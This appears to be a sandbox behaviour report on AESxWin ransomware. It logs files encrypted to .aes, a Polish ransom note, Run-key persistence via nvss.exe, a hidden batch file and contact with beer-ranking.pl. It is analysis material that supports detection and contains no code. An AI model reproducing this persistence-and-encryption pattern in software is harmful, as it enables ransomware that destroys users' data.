| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\hy7xiC9tP5aFULp5TBa.gif | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\hy7xiC9tP5aFULp5TBa.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\hy7xiC9tP5aFULp5TBa.gif.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\ljSzdoYLTSvld u.jpg | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\ljSzdoYLTSvld u.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\ljSzdoYLTSvld u.jpg.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\MEtsfgADG8jkpvQ.gif | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\MEtsfgADG8jkpvQ.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\MEtsfgADG8jkpvQ.gif.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\QB7s9AH4L3t.png | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\QB7s9AH4L3t.png | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\QB7s9AH4L3t.png.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\btMvVnX CFKn1XV99U44.gif | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\btMvVnX CFKn1XV99U44.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\btMvVnX CFKn1XV99U44.gif.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\c WNWiE5.gif | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk\c WNWiE5.gif | type = file_type |
|
2 | |
|
For performance reasons, the remaining 683 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | ||
| Open Key | HKEY_CURRENT_USER |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
3 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
2 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
3 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
5 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
2 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
2 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
7 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
3 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\AESxWin |
|
2 | ||
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = nvsvc32, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = nvsvc32, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = nvsvc32, data = C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = TZI, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = FirstEntry, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = FirstEntry, data = 2007, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = LastEntry, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = LastEntry, data = 2008, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = 2007, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = 2008, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Display, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Display, data = @tzres.dll,-670, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Std, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Std, data = @tzres.dll,-672, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Dlt, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = MUI_Dlt, data = @tzres.dll,-671, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
3 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
2 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
3 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
5 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
5 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
2 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
2 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
7 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
7 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
3 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, type = REG_SZ |
|
2 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = nvsvc32, data = C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe, size = 86, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\AESxWin | value_name = ComputerId, data = 0b75c6dd-d172-492e-b7be-2c05de30e808, size = 74, type = REG_SZ |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CMD.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Create | "C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat" | os_pid = 0xbb0, creation_flags = CREATE_NO_WINDOW, startup_flags = STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x6bc90000 |
|
1 | |
| Load | comctl32.dll | base_address = 0x74820000 |
|
1 | |
| Load | C:\Windows\system32\en-US\tzres.dll.mui | base_address = 0xe20001 |
|
3 | |
| Get Handle | comctl32.dll | base_address = 0x0 |
|
2 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x77310000 |
|
1 | |
| Get Handle | c:\users\kft6utqw\appdata\roaming\nvss.exe | base_address = 0x1120000 |
|
24 | |
| Get Handle | c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll | base_address = 0x6bc90000 |
|
83 | |
| Get Handle | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll | base_address = 0x74820000 |
|
16 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcW, address_out = 0x778d25dd |
|
1 |
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | .NET-BroadcastEventWindow.4.0.0.0.2bf8098.0 | class_name = .NET-BroadcastEventWindow.4.0.0.0.2bf8098.0, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | AESxWinAuto | class_name = WindowsForms10.Window.8.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | button8 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | button9 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | button10 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | button11 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | button12 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | checkBox1 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | button3 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | button1 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | Start | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Create | Uruchom ze startem systemu | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, wndproc_parameter = 0 |
|
1 | |
| Set Attribute | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 2005738973 |
|
1 | |
| Set Attribute | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7342410 |
|
1 | |
| Set Attribute | AESxWinAuto | class_name = WindowsForms10.Window.8.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 2005738973 |
|
1 | |
| Set Attribute | AESxWinAuto | class_name = WindowsForms10.Window.8.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7342506 |
|
1 | |
| Set Attribute | AESxWinAuto | class_name = WindowsForms10.Window.8.app.0.2bf8098_r13_ad1, index = 18446744073709551608, new_long = 66102 |
|
1 | |
| Set Attribute | AESxWinAuto | class_name = WindowsForms10.Window.8.app.0.2bf8098_r13_ad1, index = 18446744073709551608, new_long = 66102 |
|
1 | |
| Set Attribute | AESxWinAuto | class_name = WindowsForms10.Window.8.app.0.2bf8098_r13_ad1, index = 18446744073709551600, new_long = 47054848 |
|
1 | |
| Set Attribute | AESxWinAuto | class_name = WindowsForms10.Window.8.app.0.2bf8098_r13_ad1, index = 18446744073709551596, new_long = 589824 |
|
1 | |
| Set Attribute | index = 18446744073709551612, new_long = 7342698 |
|
1 | ||
| Set Attribute | button8 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | button8 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7342794 |
|
1 | |
| Set Attribute | button8 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66110 |
|
1 | |
| Set Attribute | index = 18446744073709551612, new_long = 7342890 |
|
1 | ||
| Set Attribute | button9 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | button9 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7386050 |
|
1 | |
| Set Attribute | button9 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66118 |
|
1 | |
| Set Attribute | button10 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | button10 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7386122 |
|
1 | |
| Set Attribute | button10 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66120 |
|
1 | |
| Set Attribute | button11 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | button11 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7386170 |
|
1 | |
| Set Attribute | button11 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66122 |
|
1 | |
| Set Attribute | button12 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | button12 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7386218 |
|
1 | |
| Set Attribute | button12 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66124 |
|
1 | |
| Set Attribute | checkBox1 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | checkBox1 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7386266 |
|
1 | |
| Set Attribute | checkBox1 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66126 |
|
1 | |
| Set Attribute | index = 18446744073709551612, new_long = 7386410 |
|
1 | ||
| Set Attribute | button3 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | button3 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7386458 |
|
1 | |
| Set Attribute | button3 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66136 |
|
1 | |
| Set Attribute | button1 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | button1 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7386506 |
|
1 | |
| Set Attribute | button1 | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66138 |
|
1 | |
| Set Attribute | Start | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | Start | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7386554 |
|
1 | |
| Set Attribute | Start | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66140 |
|
1 | |
| Set Attribute | Uruchom ze startem systemu | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 1954854037 |
|
1 | |
| Set Attribute | Uruchom ze startem systemu | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551612, new_long = 7386602 |
|
1 | |
| Set Attribute | Uruchom ze startem systemu | class_name = WindowsForms10.BUTTON.app.0.2bf8098_r13_ad1, index = 18446744073709551604, new_long = 66142 |
|
1 | |
| Set Attribute | index = 18446744073709551612, new_long = 7386698 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
2 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Certificate Store | encoding_type = 65537, flags = 8708 |
|
1 | |
| Get Cursor | x_out = 473, y_out = 376 |
|
5 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Sleep | duration = 105100 milliseconds (105.100 seconds) |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
225 | |
| Sleep | duration = 20 milliseconds (0.020 seconds) |
|
186 | |
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = v4.ident.me, address_out = 176.58.123.25, service = 0 |
|
1 | |
| Resolve Name | host = beer-ranking.pl, address_out = 82.221.129.19, service = 0 |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 1.08 KB (1103 bytes) |
| Total Data Received | 5.41 KB (5540 bytes) |
| Contacted Host Count | 2 |
| Contacted Hosts | 176.58.123.25:443, 82.221.129.19:80 |
| Information | Value |
|---|---|
| Handle | 0x498 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 176.58.123.25 |
| Remote Port | 443 |
| Local Address | 0.0.0.0 |
| Local Port | 2240 |
| Data Sent | 0.53 KB (542 bytes) |
| Data Received | 2.95 KB (3018 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 176.58.123.25, remote_port = 443 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 115, size_out = 115 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 85, size_out = 85 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2498, size_out = 2498 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4, size_out = 4 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 326, size_out = 326 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 48, size_out = 48 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 101, size_out = 101 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 352, size_out = 352 |
|
1 |
| Information | Value |
|---|---|
| Handle | 0x4d0 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 82.221.129.19 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 2496 |
| Data Sent | 0.55 KB (561 bytes) |
| Data Received | 2.46 KB (2522 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 82.221.129.19, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 69, size_out = 69 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 479 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 443, size_out = 443 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 180 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 49, size_out = 49 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 1863 |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.55 KB (561 bytes) |
| Total Data Received | 2.46 KB (2522 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | beer-ranking.pl |
| Information | Value |
|---|---|
| Server Name | beer-ranking.pl |
| Server Port | 80 |
| Data Sent | 0.07 KB (69 bytes) |
| Data Received | 0.47 KB (479 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = beer-ranking.pl, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /gen/ |
|
1 | |
| Send HTTP Request | headers = host: beer-ranking.pl, connection: Keep-Alive, url = beer-ranking.pl/gen/ |
|
1 | |
| Read Response | size = 4096, size_out = 479 |
|
1 |
| Information | Value |
|---|---|
| Server Name | beer-ranking.pl |
| Server Port | 80 |
| Data Sent | 0.43 KB (443 bytes) |
| Data Received | 0.18 KB (180 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = beer-ranking.pl, server_port = 80 |
|
1 | |
